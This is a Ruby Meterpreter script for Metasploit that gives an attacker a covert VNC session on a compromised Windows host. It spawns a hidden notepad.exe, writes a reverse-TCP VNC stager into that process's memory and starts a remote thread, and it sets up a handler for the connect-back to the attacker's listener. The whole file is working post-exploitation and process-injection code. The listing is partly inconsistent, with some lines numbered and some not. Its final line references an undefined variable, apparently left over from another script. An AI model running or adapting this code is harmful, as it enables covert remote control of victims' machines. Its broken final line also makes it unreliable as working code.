  1. # $Id: vnc_mem.rb 12-17-2009 hdm $
  2. #
  3. # Meterpreter script for obtaining a quick VNC session
  4. # Hybrid of vnc.rb and vnc_oneport.rb
  5. # Utilizes memory functions so no file is created
  6. # All code written by H.D. Moore (hdm)
  7. # Edited by hhmatt
  8. #
  9.  
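session = client

#
# Options
#
# -r/-p identify the listener the VNC stager connects back to; -e names the
# process that is spawned hidden and used as the injection host.
# (The original listing carried a stray "<br>" HTML tag at the end of the -h
# entry, which made the hash literal a syntax error; it has been removed.)
opts = Rex::Parser::Arguments.new(
  "-h"  => [ false, "This help menu"],
  "-r"  => [ true,  "The IP of the system running Metasploit listening for the connect back"],
  "-p"  => [ true,  "The port on the remote host where Metasploit is listening (default: 4545)"],
#  "-D"  => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"],
  "-e"  => [ true,  "The process to run and inject into (default:notepad.exe)"])

#
# Default parameters
#
runme = "notepad.exe"
# Default LHOST is whatever local address Rex selects for reaching 1.2.3.4,
# i.e. the interface with a default route; override with -r when that is not
# the address the target can actually reach.
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4545
#autoconn = true

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
  case opt
  when "-h"
    print_line(opts.usage)
    return
  when "-r"
    rhost = val
  when "-p"
    # Integer() rejects garbage outright where to_i would silently yield 0; the
    # handler and the stager must agree on a real TCP port or the connect-back
    # never arrives.
    begin
      rport = Integer(val)
    rescue ArgumentError, TypeError
      print_error("Invalid port: #{val.inspect}")
      return
    end
    unless (1..65535).include?(rport)
      print_error("Port out of range: #{rport}")
      return
    end
#  when "-D"
#    autoconn = false
  when "-e"
    runme = val
  end
end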
  48.  
  49. #
  50. # Create the agent EXE
  51. #
  52. print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
  53. pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
  54. pay.datastore['LHOST'] = rhost
  55. pay.datastore['LPORT'] = rport
  56. raw  = pay.generate
  57. exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
  58. print_status("VNC stager executable #{exe.length} bytes long")
  59.  
  60. #
  61. # Create a host process
  62. #
  63. pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
  64. print_status("Host process #{runme} has PID #{pid}")
  65. note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
  66. mem  = note.memory.allocate(1024*32)
  67. print_status("Allocated memory at address #{"0x%.8x" % mem}")
  68. print_status("Writing the VNC stager into memory...")
  69. note.memory.write(mem, raw)
  70.  
  71. #
  72. # Setup the multi/handler
  73. #
# Handler options, applied to the datastore in this order. ExitOnSession stops
# the handler once the VNC session is up; DisableCourtesyShell keeps the
# handler from pushing a command shell onto the remote desktop.
handler_opts = {
  'PAYLOAD'              => "windows/vncinject/reverse_tcp",
  'LHOST'                => rhost,
  'LPORT'                => rport,
  'EXITFUNC'             => 'process',
  'ExitOnSession'        => true,
  'DisableCourtesyShell' => true
}
mul = client.framework.exploits.create("multi/handler")
handler_opts.each { |key, value| mul.datastore[key] = value }
# Run as a background job so the script can go on to start the stager thread.
mul.exploit_simple(
  'Payload'  => handler_opts['PAYLOAD'],
  'RunAsJob' => true)
  84.  
  85. #
  86. # Execute the agent
  87. #
  88. print_status("Creating a new thread within #{runme} to run the VNC stager...")
  89. note.thread.create(mem, 0)
  90. print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
  91. proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})